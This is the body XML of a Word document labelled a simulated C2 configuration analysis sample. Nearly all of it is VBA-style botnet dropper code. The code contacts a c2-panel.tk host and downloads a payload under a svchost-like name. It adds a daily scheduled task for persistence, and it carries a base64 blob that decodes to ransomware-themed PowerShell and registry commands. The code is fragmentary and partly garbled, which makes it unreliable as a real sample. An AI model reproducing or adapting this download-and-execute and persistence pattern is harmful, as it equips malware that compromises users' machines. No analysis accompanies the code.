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 standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:body>
    <w:p><w:r><w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - C2 CONFIGURATION REVIEW</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module HiveMindC2</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Function GetCommand()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Dim http: Set http = CreateObject("WinHttp.WinHttpRequest")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">http.Open "GET", "http://c2-panel.tk/botnet/admin/login.php?auth=1&key=9f8e7d6c5b4a", False</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">URLDownloadToFile "http://c2-panel.tk/botnet/payload.bin", "C:\ProgramData\svchost.bin"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Shell("schtasks /create /tn Updater /tr C:\ProgramData\svchost.bin /sc daily")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Encoded payload: TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0ICgpIFNoZWxsICJwb3dlcnNoZWxsIC1FbmNvZGVkQ29tbWFuZCAyOTI0dWpzIiBEdW5kICJjbWQgL2MgcmVnIGFkZCBIS0xNIFNvZnR3YXJlXFJhbnNvbVdhcmUi</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">C2 heartbeat interval: 60s, beacon jitter: 20%, fallback pool: 5 hosts.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Configuration snapshot attached for review.</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>